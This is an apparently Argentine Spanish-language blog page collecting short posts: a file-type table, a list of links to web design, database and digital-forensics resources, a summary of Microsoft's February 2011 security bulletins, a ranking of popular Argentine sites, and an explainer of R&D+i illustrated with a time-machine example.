Web File Type FileType Property Value
Microsoft Word Document
DOC
Autodesk Drawing File
DWF
Really Simple Syndication (RSS) Feed
FEED
Hypertext Markup Language (.htm) File
HTM
Hypertext Markup Language (.html) File
HTML
Adobe Acrobat Portable Document
PDF
Microsoft PowerPoint Presentation
PPT
Microsoft Rich Text Format Document
RTF
Generic Text (.text) File
TEXT
Generic Text (.txt) File
TXT
Microsoft Excel Workbook
XLS
[ Leer más ]

Links de los viernes..

o lo que me quedo colgado de ver en la semana  :P



Efecto GLOSSY en PS
http://www.hongkiat.com/blog/create-cool-glossy-button-for-web/

Introducción a Informática Forense en Windows
http://www.scribd.com/doc/3576449/Introduccion-a-la-Informatica-Forense-en-Windows

45 sitios web cerveceros para inspiración
http://creativefan.com/45-inspirational-beer-and-brewery-websites/

Curso de Dreamweaver CS3 online
http://www.elwebmaster.com/editorial/taller-de-adobe-dreamweaver-divisores-y-estilos-1

Taller de Php online
http://www.elwebmaster.com/talleres/taller-de-php-programa

50 Ejemplos de Diseño Web Minimalista
http://line25.com/articles/50-inspiring-examples-of-minimalism-in-web-design

http://www.davidsalvatori.com/

curso mysql
http://www.alejandrosueldo.com.ar/joomla15/index.php?option=com_content&view=article&id=15:curso-de-sql&catid=21:cursos-y-tutoriales&Itemid=2

Tools seg inf
http://www.foolmoon.net/cgi-bin/down.pl?UID=19&email=

tecnicas de nmap y hping
https://rootsecure.wordpress.com/2008/02/24/5/

Más técnicas de scanneo
http://etutorials.org/Networking/network+security+assessment/Chapter+4.+IP+Network+Scanning/4.4+IDS+Evasion+and+Filter+Circumvention/

Comandos Esenciales en GNU/Linux para Análisis Forense Digital
http://www.sec-track.com/comandos-esenciales-en-gnulinux-para-analisis-forense-digital

Reto de Análisis Forense Digital de la Comunidad DragonJAR – Escenario e implementación
http://www.sec-track.com/reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-escenario-e-implementacion

Guias Basicas de tecnicas para Pentest
https://vulnerabilityteam.wordpress.com/2010/03/08/guias-basicas-de-tecnicas-para-pentest/

Forensics Challenge 6 organizado por The Honeynet Project
http://www.honeynet.unam.mx/content/nuevo-forensics-challenge-6-organizado-por-honeynet-project

Proyecto HoneyNet unam
http://www.honeynet.unam.mx/

Computación Forense en Bases de Datos
http://www.acis.org.co/fileadmin/Base_de_Conocimiento/IX_JornadaSeguridad/Computaci_nforenseenbasesdedatosConceptosyreflexiones-JJCM-Uniandes.pdf

Varios Docs de ing y seg
http://www.acis.org.co/fileadmin/

SQL Tool
http://www.navicat.com/download/download.html

Primer Reto Forense
http://www.dragonjar.org/primer-reto-de-analisis-forense-comunidad-dragonjar.xhtml

DragonJar Analisis Forense
http://labs.dragonjar.org/cheat-sheet-analisis-forense-digital

Blog de seg
http://vulnerabilityteam.blogspot.com/

Retos de Analisis Forense
http://www.securitybydefault.com/search/label/an%C3%A1lisis%20forense

Libro sobre Linux Server
http://www.angelux.net/2009/03/27/linux-server-los-mejores-trucos-anaya-multimedia-ebook.html

.
[ Leer más ]

Boletines de Seguridad Febrero - Microsoft

Microsoft: Resumen de Boletines de Seguridad para el mes de Febrero de 2011
La empresa Microsoft ha publicado doce boletines de seguridad correspondientes al mes de Febrero, tres calificados como "Críticos", y nueve como "Importantes".

Impacto
El impacto se encuentra indicado en la sección "Detalle" de cada uno de los boletines.

Versiones Afectadas
Las versiones afectadas varían según características y configuraciones de cada sistema en particular. Para mayor información recomendamos revisar la alerta original (ver sección "Referencias").

Detalle
MS11-003. CRÍTICOActualización de seguridad acumulativa para Internet Explorer (2482017).
MS11-006. CRÍTICO. Una vulnerabilidad en el procesamiento de gráficos del shell de Windows podría permitir la ejecución remota de código (2483185).
MS11-007. CRÍTICO. Una vulnerabilidad en el controlador de OpenType CFF (Compact Font Format) podría permitir la ejecución remota de código (2485376).
MS11-004. IMPORTANTE. Una vulnerabilidad en el servicio FTP de Internet Information Services (IIS) podría permitir la ejecución remota de código (2489256).
MS11-005. IMPORTANTE. Una vulnerabilidad en Active Directory podría permitir la denegación de servicio (2478953).
MS11-008. IMPORTANTE. Vulnerabilidades en Microsoft Visio podrían permitir la ejecución remota de código (2451879).
MS11-009. IMPORTANTE. Una vulnerabilidad en los motores de scripts de JScript y VBScript podría permitir la divulgación de información (2475792).
MS11-010. IMPORTANTE. Una vulnerabilidad en el subsistema de tiempo de ejecución de cliente-servidor de Windows podría permitir la elevación de privilegios (2476687).
MS11-011. IMPORTANTE. Vulnerabilidades del kernel de Windows podrían permitir la elevación de privilegios (2393802).
MS11-012. IMPORTANTE. Vulnerabilidades en los controladores en modo kernel de Windows podrían permitir la elevación de privilegios (2479628).
MS11-013. IMPORTANTE. Vulnerabilidades en Kerberos podrían permitir la elevación de privilegios (2496930).
MS11-014. IMPORTANTE. Una vulnerabilidad en el servicio de subsistema de autoridad de seguridad local podría permitir la elevación local de privilegios (2478960).

Recomendaciones
Se recomienda aplicar las actualizaciones de seguridad indicadas para los sistemas afectados. El proveedor ofrece, además, diversas herramientas para la automatización del proceso de actualización.

Referencias
Más información sobre este alerta:

Microsoft (en inglés):
http://www.microsoft.com/technet/security/bulletin/ms11-Feb.mspx

Microsoft  (en español):
http://www.microsoft.com/spain/technet/security/bulletin/ms11-feb.mspx
   Fuente: ArCert
[ Leer más ]

Sitios más visitados en Argentina

Interesante Ranking visual de los sitios más visitados por los Argentinos.

Desconozco que tan fiable es la lista o como obtiene este listado la fuente.

 imagen de caracter ilustrativo

http://themecraft.net/countries/AR
[ Leer más ]

I+D+i

Las siglas I+D definen el concepto de Investigación y Desarrollo, de tal forma que podemos deducir que cualquier proceso de innovación le viene asociado un proceso de Investigación y Desarrollo, esto no es correcto tal y como veremos mas adelante
El I+D se desglosa a su vez en 3 clases:
  1. Investigación Básica
  2. Investigación Aplicada
  3. Desarrollo Tecnológico.
La Investigación Básica comprende todos aquellos estudios o trabajos originales que tienen como objetivo adquirir conocimientos científicos nuevos , se analiza propiedades, estructuras y relaciones con el objetivo de formular hipótesis, teorías y leyes. En esta etapa los científicos realizan "Descubrimientos ".
La Investigación Aplicada parten de los trabajos originales desarrollados en la investigación básica, pero con el objetivo de adquirir conocimientos nuevos orientados a un objetivo practico determinado, dichos resultados son susceptibles de ser patentados, para una futura explotación comercial. En esta etapa los científicos o técnicos "Inventan ".
El desarrollo tecnológico comprende la utilización de los conocimientos adquiridos en la investigación aplicada para la producción de materiales, dispositivos, procedimientos o servicios nuevos. En esta etapa la empresa ha conseguido los conocimientos "Know How " (saber hacer) y se desarrolla los prototipos o plantas pilotos.
Por ultimo si los resultados del prototipo son eficaces y viables, se realiza inversiones para producir en grandes series y vender al mercado, entonces cuando el mercado acepta el producto o servicio, se convierte en innovación.
Proceso de I+D+i
Volviendo al ejemplo de la maquina del tiempo aplicaremos a dicha innovación el modelo de I+D:

Investigación Básica: En un principio los investigadores estudian las leyes actuales que rigen la física cuántica, analizando y ampliando las leyes legadas por Einstein, finalmente desarrollan hipótesis que se convierten en leyes acerca de la dilatación espacio-tiempo, sus descubrimientos son objeto de publicación de las primeras revistas científicas.

Investigación Aplicada: Un grupo de técnicos especialistas y científicos son reunidos para trabajar con el objetivo de crear una maquina del tiempo, la cual nos permitirá viajar a través del tiempo, basándose en los estudios anteriores , desarrollan metodologías planos y procesos, finalmente inventan la maquina del tiempo, la cual patentan para poder explotarla económicamente.

Desarrollo Técnico: La empresa desarrolla un prototipo de la maquina del tiempo, se asientan los conocimientos nuevos adquiridos y se ensaya hasta obtener unos resultados óptimos, en este momento se ha realizado el primer viaje temporal.

Innovación: La empresa produce en masa maquinas del tiempo, la humanidad acepta dicho producto pues es fiable y además proporciona un servicio totalmente novedoso, en este momento se ha producido una Innovación Radical y de Producto.


Fuente: Aquí
[ Leer más ]